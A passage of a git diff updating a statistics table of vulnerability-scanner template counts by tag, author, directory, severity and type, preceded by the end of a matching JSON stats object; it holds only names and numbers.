nematzadeh","count":1},{"name":"j3ssie/geraldino2","count":1},{"name":"hakimkt","count":1},{"name":"x6263","count":1},{"name":"phyr3wall","count":1}],"directory":[{"name":"cves","count":1200},{"name":"exposed-panels","count":535},{"name":"vulnerabilities","count":458},{"name":"technologies","count":258},{"name":"exposures","count":205},{"name":"misconfiguration","count":200},{"name":"workflows","count":187},{"name":"token-spray","count":169},{"name":"default-logins","count":96},{"name":"file","count":76},{"name":"takeovers","count":67},{"name":"iot","count":38},{"name":"network","count":35},{"name":"miscellaneous","count":24},{"name":"cnvd","count":23},{"name":"dns","count":17},{"name":"fuzzing","count":12},{"name":"headless","count":6},{"name":"ssl","count":5}],"severity":[{"name":"info","count":1230},{"name":"high","count":899},{"name":"medium","count":687},{"name":"critical","count":415},{"name":"low","count":186},{"name":"unknown","count":6}],"types":[{"name":"http","count":3269},{"name":"file","count":76},{"name":"network","count":50},{"name":"dns","count":17}]} diff --git a/TEMPLATES-STATS.md b/TEMPLATES-STATS.md index 680bd9d8a7..e0f740586a 100644 --- a/TEMPLATES-STATS.md +++ b/TEMPLATES-STATS.md @@ -1,15 +1,15 @@ | TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT | |----------------------|-------|-------------------------------------|-------|------------------|-------|----------|-------|---------|-------| -| cve | 1191 | daffainfo | 565 | cves | 1196 | info | 1220 | http | 3263 | -| panel | 524 | dhiyaneshdk | 424 | exposed-panels | 533 | high | 895 | file | 68 | -| lfi | 467 | pikpikcu | 316 | vulnerabilities | 458 | medium | 681 | network | 50 | -| xss | 379 | pdteam | 266 | technologies | 258 | critical | 421 | dns | 17 | -| wordpress | 375 | geeknik | 181 | exposures | 205 | low | 186 | | | -| rce | 302 | dwisiswant0 | 168 | misconfiguration | 200 | unknown | 6 | | | -| exposure | 298 | 0x_akoko | 139 | workflows | 187 | | | | | -| cve2021 | 291 | princechaddha | 139 | token-spray | 169 | | | | | -| wp-plugin | 274 | gy741 | 122 | default-logins | 96 | | | | | -| tech | 274 | pussycat0x | 116 | file | 68 | | | | | +| cve | 1195 | daffainfo | 565 | cves | 1200 | info | 1230 | http | 3269 | +| panel | 525 | dhiyaneshdk | 424 | exposed-panels | 535 | high | 899 | file | 76 | +| lfi | 467 | pikpikcu | 316 | vulnerabilities | 458 | medium | 687 | network | 50 | +| xss | 382 | pdteam | 268 | technologies | 258 | critical | 415 | dns | 17 | +| wordpress | 376 | geeknik | 181 | exposures | 205 | low | 186 | | | +| rce | 304 | dwisiswant0 | 168 | misconfiguration | 200 | unknown | 6 | | | +| exposure | 298 | princechaddha | 139 | workflows | 187 | | | | | +| cve2021 | 294 | 0x_akoko | 139 | token-spray | 169 | | | | | +| wp-plugin | 275 | pussycat0x | 124 | default-logins | 96 | | | | | +| tech | 274 | gy741 | 122 | file | 76 | | | | | | cve2020 | 197 | madrobot | 65 | takeovers | 67 | | | | | | | 190 | zzeitlin | 64 | iot | 38 | | | | | | token-spray | 169 | ritikchaddha | 53 | network | 35 | | | | | @@ -18,1588 +18,1595 @@ | cve2018 | 125 | philippedelteil | 36 | dns | 17 | | | | | | cve2019 | 123 | adam crosser | 30 | fuzzing | 12 | | | | | | apache | 120 | ice3man | 26 | headless | 6 | | | | | -| unauth | 114 | organiccrap | 24 | ssl | 5 | | | | | -| cve2010 | 111 | c-sh0 | 24 | | | | | | | -| default-login | 110 | ffffffff0x | 22 | | | | | | | -| iot | 106 | akincibor | 22 | | | | | | | -| oast | 99 | for3stco1d | 20 | | | | | | | -| login | 86 | righettod | 19 | | | | | | | -| cve2022 | 78 | techbrunchfr | 18 | | | | | | | -| redirect | 77 | cckuailong | 17 | | | | | | | -| takeover | 73 | sheikhrishad | 15 | | | | | | | -| token | 72 | pr3r00t | 15 | | | | | | | -| misconfig | 68 | r3dg33k | 14 | | | | | | | -| wp | 65 | milo2012 | 14 | | | | | | | -| ssrf | 65 | 0ri2n | 13 | | | | | | | -| cve2017 | 65 | sharath | 13 | | | | | | | -| sqli | 63 | sullo | 12 | | | | | | | -| router | 61 | suman_kar | 12 | | | | | | | -| file | 60 | melbadry9 | 12 | | | | | | | -| network | 53 | wdahlenb | 11 | | | | | | | +| unauth | 114 | c-sh0 | 24 | ssl | 5 | | | | | +| cisa | 112 | organiccrap | 24 | | | | | | | +| cve2010 | 111 | ffffffff0x | 22 | | | | | | | +| default-login | 110 | akincibor | 22 | | | | | | | +| iot | 106 | for3stco1d | 20 | | | | | | | +| oast | 100 | righettod | 19 | | | | | | | +| login | 86 | techbrunchfr | 18 | | | | | | | +| cve2022 | 79 | cckuailong | 17 | | | | | | | +| redirect | 77 | sheikhrishad | 15 | | | | | | | +| takeover | 73 | pr3r00t | 15 | | | | | | | +| token | 72 | milo2012 | 14 | | | | | | | +| router | 68 | r3dg33k | 14 | | | | | | | +| misconfig | 68 | sharath | 13 | | | | | | | +| wp | 65 | 0ri2n | 13 | | | | | | | +| ssrf | 65 | sullo | 12 | | | | | | | +| cve2017 | 65 | melbadry9 | 12 | | | | | | | +| sqli | 63 | suman_kar | 12 | | | | | | | +| file | 60 | wdahlenb | 11 | | | | | | | +| network | 53 | edoardottt | 11 | | | | | | | | oracle | 52 | cyllective | 11 | | | | | | | -| disclosure | 46 | alph4byt3 | 10 | | | | | | | -| cve2016 | 45 | johnk3r | 10 | | | | | | | -| auth-bypass | 44 | meme-lord | 10 | | | | | | | -| authenticated | 40 | dogasantos | 10 | | | | | | | -| plugin | 40 | random_robbie | 10 | | | | | | | -| google | 37 | hackergautam | 10 | | | | | | | -| cve2014 | 37 | nadino | 10 | | | | | | | -| cve2015 | 37 | edoardottt | 9 | | | | | | | -| cisco | 35 | emadshanab | 9 | | | | | | | -| injection | 33 | logicalhunter | 8 | | | | | | | +| disclosure | 46 | random_robbie | 10 | | | | | | | +| cve2016 | 45 | dogasantos | 10 | | | | | | | +| auth-bypass | 44 | alph4byt3 | 10 | | | | | | | +| cisco | 43 | johnk3r | 10 | | | | | | | +| authenticated | 40 | meme-lord | 10 | | | | | | | +| plugin | 40 | nadino | 10 | | | | | | | +| cve2015 | 37 | hackergautam | 10 | | | | | | | +| cve2014 | 37 | emadshanab | 9 | | | | | | | +| google | 37 | zh | 8 | | | | | | | | logs | 33 | aashiq | 8 | | | | | | | -| atlassian | 32 | iamthefrogy | 8 | | | | | | | -| listing | 30 | random-robbie | 8 | | | | | | | -| oss | 30 | that_juan_ | 8 | | | | | | | -| jira | 30 | zh | 8 | | | | | | | -| traversal | 29 | 0x240x23elu | 7 | | | | | | | -| devops | 29 | caspergn | 7 | | | | | | | +| injection | 33 | iamthefrogy | 8 | | | | | | | +| atlassian | 32 | that_juan_ | 8 | | | | | | | +| oss | 31 | random-robbie | 8 | | | | | | | +| jira | 30 | 0x240x23elu | 8 | | | | | | | +| listing | 30 | logicalhunter | 8 | | | | | | | +| traversal | 29 | caspergn | 7 | | | | | | | +| devops | 29 | techryptic (@tech) | 7 | | | | | | | +| dns | 27 | divya_mudgal | 7 | | | | | | | | generic | 27 | harshbothra_ | 7 | | | | | | | -| dns | 27 | oppsec | 7 | | | | | | | -| kubernetes | 26 | techryptic (@tech) | 7 | | | | | | | -| cms | 25 | forgedhallpass | 7 | | | | | | | -| adobe | 24 | divya_mudgal | 7 | | | | | | | -| springboot | 24 | randomstr1ng | 7 | | | | | | | -| intrusive | 23 | kophjager007 | 7 | | | | | | | -| cnvd | 23 | dr_set | 7 | | | | | | | -| proxy | 22 | pentest_swissky | 6 | | | | | | | +| intrusive | 26 | forgedhallpass | 7 | | | | | | | +| kubernetes | 26 | randomstr1ng | 7 | | | | | | | +| cms | 25 | kophjager007 | 7 | | | | | | | +| adobe | 24 | oppsec | 7 | | | | | | | +| springboot | 24 | dr_set | 7 | | | | | | | +| cnvd | 23 | leovalcante | 6 | | | | | | | +| sap | 22 | pentest_swissky | 6 | | | | | | | | vmware | 22 | puzzlepeaches | 6 | | | | | | | -| sap | 22 | veshraj | 6 | | | | | | | +| proxy | 22 | veshraj | 6 | | | | | | | +| misc | 21 | pathtaga | 6 | | | | | | | +| microsoft | 21 | evan rubinstein | 6 | | | | | | | +| debug | 21 | imnightmaree | 6 | | | | | | | | aem | 21 | iamnoooob | 6 | | | | | | | -| misc | 21 | imnightmaree | 6 | | | | | | | -| microsoft | 21 | leovalcante | 6 | | | | | | | -| debug | 21 | rootxharsh | 6 | | | | | | | -| fuzz | 20 | __fazal | 6 | | | | | | | -| wp-theme | 20 | pathtaga | 6 | | | | | | | -| service | 20 | evan rubinstein | 6 | | | | | | | -| cve2012 | 19 | yanyun | 5 | | | | | | | -| manageengine | 19 | xelkomy | 5 | | | | | | | -| zoho | 18 | praetorian-thendrickson | 5 | | | | | | | -| deserialization | 18 | podalirius | 5 | | | | | | | -| php | 18 | elsfa7110 | 5 | | | | | | | -| weblogic | 18 | _0xf4n9x_ | 5 | | | | | | | +| fuzz | 20 | rootxharsh | 6 | | | | | | | +| wp-theme | 20 | __fazal | 6 | | | | | | | +| service | 20 | praetorian-thendrickson | 5 | | | | | | | +| manageengine | 19 | ganofins | 5 | | | | | | | +| cve2012 | 19 | tess | 5 | | | | | | | +| deserialization | 18 | elsfa7110 | 5 | | | | | | | +| zoho | 18 | _0xf4n9x_ | 5 | | | | | | | +| weblogic | 18 | yanyun | 5 | | | | | | | +| php | 18 | panch0r3d | 5 | | | | | | | | aws | 17 | joanbono | 5 | | | | | | | -| k8s | 17 | ganofins | 5 | | | | | | | -| tomcat | 17 | lu4nx | 5 | | | | | | | -| ibm | 16 | panch0r3d | 5 | | | | | | | -| struts | 16 | tess | 5 | | | | | | | -| fileupload | 16 | tanq16 | 4 | | | | | | | -| dlink | 16 | e_schultze_ | 4 | | | | | | | -| cve2011 | 15 | dolev farhi | 4 | | | | | | | -| jenkins | 15 | defr0ggy | 4 | | | | | | | -| api | 15 | nodauf | 4 | | | | | | | -| gitlab | 15 | h1ei1 | 4 | | | | | | | -| xxe | 14 | dadevel | 4 | | | | | | | -| hp | 14 | wisnupramoedya | 4 | | | | | | | -| cve2009 | 14 | incogbyte | 4 | | | | | | | -| camera | 14 | emenalf | 3 | | | | | | | -| android | 14 | johnjhacking | 3 | | | | | | | -| java | 14 | impramodsargar | 3 | | | | | | | -| cve2013 | 13 | skeltavik | 3 | | | | | | | -| ruijie | 13 | whoever | 3 | | | | | | | -| firewall | 13 | dudez | 3 | | | | | | | -| rails | 12 | r3naissance | 3 | | | | | | | -| lfr | 12 | alifathi-h1 | 3 | | | | | | | -| netsweeper | 12 | davidmckennirey | 3 | | | | | | | -| log4j | 12 | dr0pd34d | 3 | | | | | | | -| status | 12 | fyoorer | 3 | | | | | | | -| printer | 12 | f1tz | 3 | | | | | | | -| nginx | 12 | andydoering | 3 | | | | | | | -| magento | 11 | yuzhe-zhang-0 | 3 | | | | | | | -| cnvd2021 | 11 | binaryfigments | 3 | | | | | | | -| netgear | 11 | lark-lab | 3 | | | | | | | -| graphql | 11 | shifacyclewala | 3 | | | | | | | -| upload | 11 | sushantkamble | 3 | | | | | | | -| jolokia | 10 | github.com/its0x08 | 3 | | | | | | | -| airflow | 10 | _generic_human_ | 3 | | | | | | | -| fortigate | 10 | gitlab red team | 3 | | | | | | | -| zyxel | 10 | shine | 3 | | | | | | | -| spring | 10 | 3th1c_yuk1 | 3 | | | | | | | -| dell | 10 | mr-xn | 3 | | | | | | | -| glpi | 10 | thomas_from_offensity | 3 | | | | | | | -| grafana | 10 | supras | 3 | | | | | | | -| backup | 10 | arcc | 3 | | | | | | | +| tomcat | 17 | podalirius | 5 | | | | | | | +| k8s | 17 | xelkomy | 5 | | | | | | | +| struts | 16 | lu4nx | 5 | | | | | | | +| fileupload | 16 | dolev farhi | 4 | | | | | | | +| ibm | 16 | defr0ggy | 4 | | | | | | | +| dlink | 16 | nodauf | 4 | | | | | | | +| firewall | 15 | h1ei1 | 4 | | | | | | | +| cve2011 | 15 | dadevel | 4 | | | | | | | +| jenkins | 15 | incogbyte | 4 | | | | | | | +| gitlab | 15 | e_schultze_ | 4 | | | | | | | +| api | 15 | tanq16 | 4 | | | | | | | +| java | 14 | wisnupramoedya | 4 | | | | | | | +| xxe | 14 | dudez | 3 | | | | | | | +| hp | 14 | gitlab red team | 3 | | | | | | | +| camera | 14 | thomas_from_offensity | 3 | | | | | | | +| cve2009 | 14 | jarijaas | 3 | | | | | | | +| android | 14 | arcc | 3 | | | | | | | +| cve2013 | 13 | _generic_human_ | 3 | | | | | | | +| ruijie | 13 | z3bd | 3 | | | | | | | +| lfr | 12 | f1tz | 3 | | | | | | | +| nginx | 12 | impramodsargar | 3 | | | | | | | +| netsweeper | 12 | alifathi-h1 | 3 | | | | | | | +| rails | 12 | github.com/its0x08 | 3 | | | | | | | +| printer | 12 | andydoering | 3 | | | | | | | +| log4j | 12 | r3naissance | 3 | | | | | | | +| status | 12 | sushantkamble | 3 | | | | | | | +| upload | 11 | mavericknerd | 3 | | | | | | | +| netgear | 11 | shifacyclewala | 3 | | | | | | | +| graphql | 11 | 3th1c_yuk1 | 3 | | | | | | | +| magento | 11 | emenalf | 3 | | | | | | | +| cnvd2021 | 11 | dr0pd34d | 3 | | | | | | | +| jolokia | 10 | binaryfigments | 3 | | | | | | | +| grafana | 10 | skeltavik | 3 | | | | | | | +| airflow | 10 | supras | 3 | | | | | | | +| spring | 10 | mr-xn | 3 | | | | | | | +| zyxel | 10 | 0w4ys | 3 | | | | | | | +| backup | 10 | whoever | 3 | | | | | | | +| fortigate | 10 | shine | 3 | | | | | | | +| glpi | 10 | davidmckennirey | 3 | | | | | | | +| dell | 10 | me9187 | 3 | | | | | | | | coldfusion | 10 | unstabl3 | 3 | | | | | | | -| wso2 | 9 | me9187 | 3 | | | | | | | -| ftp | 9 | z3bd | 3 | | | | | | | -| fastjson | 9 | 0w4ys | 3 | | | | | | | -| github | 9 | jarijaas | 3 | | | | | | | -| fortinet | 9 | yash anand @yashanand155 | 3 | | | | | | | -| jndi | 9 | mavericknerd | 3 | | | | | | | -| auth | 9 | y4er | 2 | | | | | | | -| windows | 9 | danielmofer | 2 | | | | | | | -| iis | 9 | hahwul | 2 | | | | | | | -| cve2008 | 9 | 0xsmiley | 2 | | | | | | | -| laravel | 9 | gevakun | 2 | | | | | | | -| drupal | 9 | splint3r7 | 2 | | | | | | | -| woocommerce | 9 | manas_harsh | 2 | | | | | | | -| webserver | 9 | ambassify | 2 | | | | | | | -| zabbix | 9 | huowuzhao | 2 | | | | | | | -| mirai | 9 | parth | 2 | | | | | | | -| scada | 8 | r12w4n | 2 | | | | | | | -| metadata | 8 | nuk3s3c | 2 | | | | | | | -| dedecms | 8 | cckuakilong | 2 | | | | | | | -| confluence | 8 | convisoappsec | 2 | | | | | | | -| citrix | 8 | joeldeleep | 2 | | | | | | | -| ssl | 8 | afaq | 2 | | | | | | | -| phpmyadmin | 8 | ajaysenr | 2 | | | | | | | -| blind | 8 | kiblyn11 | 2 | | | | | | | -| azure | 8 | martincodes-de | 2 | | | | | | | -| django | 8 | z0ne | 2 | | | | | | | -| kube | 8 | dahse89 | 2 | | | | | | | -| prometheus | 8 | smaranchand | 2 | | | | | | | -| amazon | 8 | 0xelkomy | 2 | | | | | | | -| recon | 8 | rafaelwdornelas | 2 | | | | | | | -| audit | 8 | mahendra purbia (mah3sec_) | 2 | | | | | | | -| vcenter | 8 | redteambrasil | 2 | | | | | | | -| solr | 8 | g4l1t0 | 2 | | | | | | | -| vpn | 7 | paradessia | 2 | | | | | | | -| maps | 7 | hassan khan yusufzai - | 2 | | | | | | | +| laravel | 9 | yuzhe-zhang-0 | 3 | | | | | | | +| fastjson | 9 | fyoorer | 3 | | | | | | | +| confluence | 9 | lark-lab | 3 | | | | | | | +| wso2 | 9 | johnjhacking | 3 | | | | | | | +| mirai | 9 | yash anand @yashanand155 | 3 | | | | | | | +| windows | 9 | prajiteshsingh | 2 | | | | | | | +| woocommerce | 9 | swissky | 2 | | | | | | | +| cve2008 | 9 | moritz nentwig | 2 | | | | | | | +| zabbix | 9 | ajaysenr | 2 | | | | | | | +| jndi | 9 | sy3omda | 2 | | | | | | | +| webserver | 9 | pxmme1337 | 2 | | | | | | | +| ftp | 9 | paradessia | 2 | | | | | | | +| auth | 9 | n-thumann | 2 | | | | | | | +| github | 9 | 0xelkomy | 2 | | | | | | | +| iis | 9 | smaranchand | 2 | | | | | | | +| fortinet | 9 | r12w4n | 2 | | | | | | | +| drupal | 9 | fabaff | 2 | | | | | | | +| blind | 8 | cckuakilong | 2 | | | | | | | +| amazon | 8 | taielab | 2 | | | | | | | +| scada | 8 | parth | 2 | | | | | | | +| dedecms | 8 | koti2 | 2 | | | | | | | +| kube | 8 | rafaelwdornelas | 2 | | | | | | | +| django | 8 | ehsahil | 2 | | | | | | | +| solr | 8 | dheerajmadhukar | 2 | | | | | | | +| vcenter | 8 | kiblyn11 | 2 | | | | | | | +| config-audit | 8 | luci | 2 | | | | | | | +| metadata | 8 | 0xsapra | 2 | | | | | | | +| recon | 8 | nvn1729 | 2 | | | | | | | +| backdoor | 8 | z0ne | 2 | | | | | | | +| prometheus | 8 | randomrobbie | 2 | | | | | | | +| audit | 8 | joshlarsen | 2 | | | | | | | +| phpmyadmin | 8 | socketz | 2 | | | | | | | +| ssl | 8 | joeldeleep | 2 | | | | | | | +| cisco-switch | 8 | sbani | 2 | | | | | | | +| azure | 8 | convisoappsec | 2 | | | | | | | +| citrix | 8 | bp0lr | 2 | | | | | | | +| rconfig | 7 | its0x08 | 2 | | | | | | | +| kafka | 7 | nuk3s3c | 2 | | | | | | | +| sonicwall | 7 | foulenzer | 2 | | | | | | | +| maps | 7 | splint3r7 | 2 | | | | | | | +| python | 7 | huowuzhao | 2 | | | | | | | +| elasticsearch | 7 | mahendra purbia (mah3sec_) | 2 | | | | | | | +| firebase | 7 | kre80r | 2 | | | | | | | +| ssti | 7 | bernardofsr | 2 | | | | | | | +| headless | 7 | mohammedsaneem | 2 | | | | | | | +| vpn | 7 | redteambrasil | 2 | | | | | | | +| mail | 7 | bananabr | 2 | | | | | | | +| bucket | 7 | g4l1t0 | 2 | | | | | | | +| cnvd2020 | 7 | paperpen | 2 | | | | | | | +| files | 7 | gevakun | 2 | | | | | | | +| exchange | 7 | ree4pwn | 2 | | | | | | | +| squirrelmail | 7 | udit_thakkur | 2 | | | | | | | +| docker | 6 | ambassify | 2 | | | | | | | +| firmware | 6 | badboycxcc | 2 | | | | | | | +| enum | 6 | zomsop82 | 2 | | | | | | | +| ecology | 6 | martincodes-de | 2 | | | | | | | +| slack | 6 | vavkamil | 2 | | | | | | | +| crlf | 6 | cristi vlad (@cristivlad25) | 2 | | | | | | | +| bigip | 6 | amsda | 2 | | | | | | | +| ofbiz | 6 | 0xprial | 2 | | | | | | | +| nodejs | 6 | x1m_martijn | 2 | | | | | | | +| zimbra | 6 | 0xcrypto | 2 | | | | | | | +| jetty | 6 | gal nagli | 2 | | | | | | | +| cicd | 6 | hassan khan yusufzai - | 2 | | | | | | | | | | splint3r7 | | | | | | | | -| ssti | 7 | 0xcrypto | 2 | | | | | | | -| files | 7 | moritz nentwig | 2 | | | | | | | -| elasticsearch | 7 | luci | 2 | | | | | | | -| exchange | 7 | dheerajmadhukar | 2 | | | | | | | -| kafka | 7 | joshlarsen | 2 | | | | | | | -| mail | 7 | gal nagli | 2 | | | | | | | -| bucket | 7 | vavkamil | 2 | | | | | | | -| firebase | 7 | foulenzer | 2 | | | | | | | -| headless | 7 | vsh00t | 2 | | | | | | | -| rconfig | 7 | sbani | 2 | | | | | | | -| backdoor | 7 | kre80r | 2 | | | | | | | -| squirrelmail | 7 | koti2 | 2 | | | | | | | -| sonicwall | 7 | zomsop82 | 2 | | | | | | | -| cnvd2020 | 7 | thardt-praetorian | 2 | | | | | | | -| python | 7 | sy3omda | 2 | | | | | | | -| nodejs | 6 | bing0o | 2 | | | | | | | -| go | 6 | amsda | 2 | | | | | | | -| sitecore | 6 | randomrobbie | 2 | | | | | | | -| lucee | 6 | cristi vlad (@cristivlad25) | 2 | | | | | | | -| fpd | 6 | 0xrudra | 2 | | | | | | | -| zimbra | 6 | raesene | 2 | | | | | | | -| crlf | 6 | lotusdll | 2 | | | | | | | -| docker | 6 | fabaff | 2 | | | | | | | -| cobbler | 6 | taielab | 2 | | | | | | | -| druid | 6 | 0xprial | 2 | | | | | | | -| huawei | 6 | bananabr | 2 | | | | | | | -| bypass | 6 | paperpen | 2 | | | | | | | -| enum | 6 | n-thumann | 2 | | | | | | | -| ofbiz | 6 | bernardofsr | 2 | | | | | | | -| ecology | 6 | k11h-de | 2 | | | | | | | -| bigip | 6 | pxmme1337 | 2 | | | | | | | -| firmware | 6 | ehsahil | 2 | | | | | | | -| cicd | 6 | socketz | 2 | | | | | | | -| magmi | 6 | ree4pwn | 2 | | | | | | | -| jboss | 6 | its0x08 | 2 | | | | | | | -| jetty | 6 | hackerarpan | 2 | | | | | | | -| slack | 6 | geekby | 2 | | | | | | | -| apisix | 5 | nvn1729 | 2 | | | | | | | -| scan | 5 | udit_thakkur | 2 | | | | | | | -| setup | 5 | 0xsapra | 2 | | | | | | | -| gocd | 5 | bsysop | 2 | | | | | | | -| icewarp | 5 | prajiteshsingh | 2 | | | | | | | -| leak | 5 | hetroublemakr | 2 | | | | | | | -| error | 5 | mohammedsaneem | 2 | | | | | | | -| circarlife | 5 | w4cky_ | 2 | | | | | | | -| rseenet | 5 | nkxxkn | 2 | | | | | | | -| alibaba | 5 | badboycxcc | 2 | | | | | | | -| symantec | 5 | x1m_martijn | 2 | | | | | | | -| rfi | 5 | bp0lr | 2 | | | | | | | -| solarwinds | 5 | cocxanh | 2 | | | | | | | -| moodle | 5 | swissky | 2 | | | | | | | -| symfony | 5 | akshansh | 1 | | | | | | | -| zhiyuan | 5 | furkansenan | 1 | | | | | | | -| artica | 5 | miroslavsotak | 1 | | | | | | | -| node | 5 | rotemreiss | 1 | | | | | | | -| fatpipe | 5 | rojanrijal | 1 | | | | | | | -| strapi | 5 | husain | 1 | | | | | | | -| opensis | 5 | charanrayudu | 1 | | | | | | | -| keycloak | 5 | dhiyaneshdki | 1 | | | | | | | -| samsung | 5 | v0idc0de | 1 | | | | | | | -| thinkphp | 5 | soyelmago | 1 | | | | | | | -| storage | 5 | coldfish | 1 | | | | | | | -| kubelet | 5 | vzamanillo | 1 | | | | | | | -| microweber | 5 | sshell | 1 | | | | | | | -| ruby | 5 | rschio | 1 | | | | | | | -| cache | 5 | izn0u | 1 | | | | | | | -| minio | 5 | ok_bye_now | 1 | | | | | | | -| git | 5 | retr02332 | 1 | | | | | | | -| metinfo | 5 | notsoevilweasel | 1 | | | | | | | -| db | 4 | pudsec | 1 | | | | | | | -| tikiwiki | 4 | ahmetpergamum | 1 | | | | | | | -| sonarqube | 4 | noamrathaus | 1 | | | | | | | -| hongdian | 4 | jbaines-r7 | 1 | | | | | | | -| mailchimp | 4 | absshax | 1 | | | | | | | -| aspose | 4 | gboddin | 1 | | | | | | | -| jetbrains | 4 | tim_koopmans | 1 | | | | | | | -| springcloud | 4 | toufik-airane | 1 | | | | | | | -| telesquare | 4 | official_blackhat13 | 1 | | | | | | | -| search | 4 | tirtha_mandal | 1 | | | | | | | -| smtp | 4 | d0rkerdevil | 1 | | | | | | | -| gogs | 4 | kaizensecurity | 1 | | | | | | | -| resin | 4 | tea | 1 | | | | | | | -| activemq | 4 | push4d | 1 | | | | | | | -| cloud | 4 | ivo palazzolo (@palaziv) | 1 | | | | | | | -| database | 4 | sherlocksecurity | 1 | | | | | | | -| buffalo | 4 | wabafet | 1 | | | | | | | -| stripe | 4 | mass0ma | 1 | | | | | | | -| terramaster | 4 | jrolf | 1 | | | | | | | -| xmlrpc | 4 | aaronchen0 | 1 | | | | | | | -| ssh | 4 | lethargynavigator | 1 | | | | | | | -| jellyfin | 4 | whynotke | 1 | | | | | | | -| mongodb | 4 | b4uh0lz | 1 | | | | | | | -| websphere | 4 | makyotox | 1 | | | | | | | -| npm | 4 | skylark-lab | 1 | | | | | | | -| sangfor | 4 | ofjaaah | 1 | | | | | | | -| cockpit | 4 | thesubtlety | 1 | | | | | | | -| elastic | 4 | breno_css | 1 | | | | | | | -| asp | 4 | lark lab | 1 | | | | | | | -| ognl | 4 | c3l3si4n | 1 | | | | | | | -| postmessage | 4 | clment cruchet | 1 | | | | | | | -| vbulletin | 4 | geraldino2 | 1 | | | | | | | -| awstats | 4 | amnotacat | 1 | | | | | | | -| puppet | 4 | orpheus | 1 | | | | | | | -| sophos | 4 | 0ut0fb4nd | 1 | | | | | | | -| cacti | 4 | willd96 | 1 | | | | | | | -| paypal | 4 | iphantasmic | 1 | | | | | | | -| caucho | 4 | manikanta a.k.a @secureitmania | 1 | | | | | | | -| prestashop | 4 | jteles | 1 | | | | | | | -| hoteldruid | 4 | luqman | 1 | | | | | | | -| hikvision | 4 | yuansec | 1 | | | | | | | -| beyondtrust | 4 | evolutionsec | 1 | | | | | | | -| flink | 4 | alevsk | 1 | | | | | | | -| nexus | 4 | elouhi | 1 | | | | | | | -| phppgadmin | 4 | osamahamad | 1 | | | | | | | -| artifactory | 4 | kba@sogeti_esec | 1 | | | | | | | -| cve2007 | 4 | kiks7 | 1 | | | | | | | -| microstrategy | 4 | retr0 | 1 | | | | | | | -| cnvd2019 | 4 | sicksec | 1 | | | | | | | -| plesk | 4 | flag007 | 1 | | | | | | | -| kevinlab | 4 | arm!tage | 1 | | | | | | | -| wcs | 4 | 0xteles | 1 | | | | | | | -| kibana | 4 | thebinitghimire | 1 | | | | | | | -| adminer | 4 | un-fmunozs | 1 | | | | | | | -| hpe | 4 | mhdsamx | 1 | | | | | | | -| voip | 4 | anon-artist | 1 | | | | | | | -| thinkcmf | 4 | ahmed sherif | 1 | | | | | | | -| photo | 4 | francescocarlucci | 1 | | | | | | | -| couchdb | 4 | ratnadip gajbhiye | 1 | | | | | | | -| oa | 4 | twitter.com/dheerajmadhukar | 1 | | | | | | | -| panos | 4 | mrcl0wnlab | 1 | | | | | | | -| redis | 3 | hanlaomo | 1 | | | | | | | -| centos | 3 | opencirt | 1 | | | | | | | -| mcafee | 3 | nerrorsec | 1 | | | | | | | -| zte | 3 | ldionmarcil | 1 | | | | | | | -| glassfish | 3 | kabirsuda | 1 | | | | | | | -| movable | 3 | elmahdi | 1 | | | | | | | -| mongo | 3 | matthew nickerson (b0than) @ | 1 | | | | | | | -| | | layer 8 security | | | | | | | | -| messaging | 3 | droberson | 1 | | | | | | | -| openam | 3 | revblock | 1 | | | | | | | -| empirecms | 3 | korteke | 1 | | | | | | | -| exposures | 3 | udyz | 1 | | | | | | | -| jeesns | 3 | brenocss | 1 | | | | | | | -| httpbin | 3 | akash.c | 1 | | | | | | | -| concrete | 3 | nytr0gen | 1 | | | | | | | -| elfinder | 3 | co0nan | 1 | | | | | | | -| hashicorp | 3 | brabbit10 | 1 | | | | | | | -| fortios | 3 | regala_ | 1 | | | | | | | -| thinfinity | 3 | philippdelteil | 1 | | | | | | | -| openbmcs | 3 | majidmc2 | 1 | | | | | | | -| sendgrid | 3 | igibanez | 1 | | | | | | | -| grav | 3 | blckraven | 1 | | | | | | | -| sharepoint | 3 | daviey | 1 | | | | | | | -| umbraco | 3 | d4vy | 1 | | | | | | | -| fanruan | 3 | justmumu | 1 | | | | | | | -| cisa | 3 | prettyboyaaditya | 1 | | | | | | | -| panabit | 3 | 0xd0ff9 | 1 | | | | | | | -| telerik | 3 | alexrydzak | 1 | | | | | | | -| linkerd | 3 | wlayzz | 1 | | | | | | | -| 3cx | 3 | mubassirpatel | 1 | | | | | | | -| nuuo | 3 | mesaglio | 1 | | | | | | | -| modem | 3 | affix | 1 | | | | | | | -| workspaceone | 3 | compr00t | 1 | | | | | | | -| lotus | 3 | bjhulst | 1 | | | | | | | -| bitrix | 3 | kishore krishna (sillydaddy) | 1 | | | | | | | -| openssh | 3 | kurohost | 1 | | | | | | | -| rlm | 3 | ilovebinbash | 1 | | | | | | | -| seagate | 3 | 0xrod | 1 | | | | | | | -| prtg | 3 | shelld3v | 1 | | | | | | | -| selea | 3 | exploitation | 1 | | | | | | | -| wavlink | 3 | bughuntersurya | 1 | | | | | | | -| seeyon | 3 | florianmaak | 1 | | | | | | | -| javascript | 3 | 0xceeb | 1 | | | | | | | -| heroku | 3 | deena | 1 | | | | | | | -| geowebserver | 3 | ph33r | 1 | | | | | | | -| webadmin | 3 | zsusac | 1 | | | | | | | -| dolibarr | 3 | fq_hsu | 1 | | | | | | | -| smb | 3 | f1she3 | 1 | | | | | | | -| zeroshell | 3 | noobexploiter | 1 | | | | | | | -| vrealize | 3 | ggranjus | 1 | | | | | | | -| ems | 3 | alperenkesk | 1 | | | | | | | -| ebs | 3 | hakimkt | 1 | | | | | | | -| aptus | 3 | xstp | 1 | | | | | | | -| actuator | 3 | apt-mirror | 1 | | | | | | | -| httpd | 3 | berkdusunur | 1 | | | | | | | -| axis2 | 3 | nielsing | 1 | | | | | | | -| ampps | 3 | myztique | 1 | | | | | | | -| odoo | 3 | petruknisme | 1 | | | | | | | -| axis | 3 | hakluke | 1 | | | | | | | -| globalprotect | 3 | nullfuzz | 1 | | | | | | | -| wordfence | 3 | thevillagehacker | 1 | | | | | | | -| targa | 3 | j33n1k4 | 1 | | | | | | | -| sugarcrm | 3 | oscarintherocks | 1 | | | | | | | -| bruteforce | 3 | bernardo rodrigues | 1 | | | | | | | -| | | @bernardofsr | | | | | | | | -| pentaho | 3 | andysvints | 1 | | | | | | | -| jfrog | 3 | tirtha | 1 | | | | | | | -| facebook | 3 | th3.d1p4k | 1 | | | | | | | -| trendnet | 3 | manuelbua | 1 | | | | | | | -| rackn | 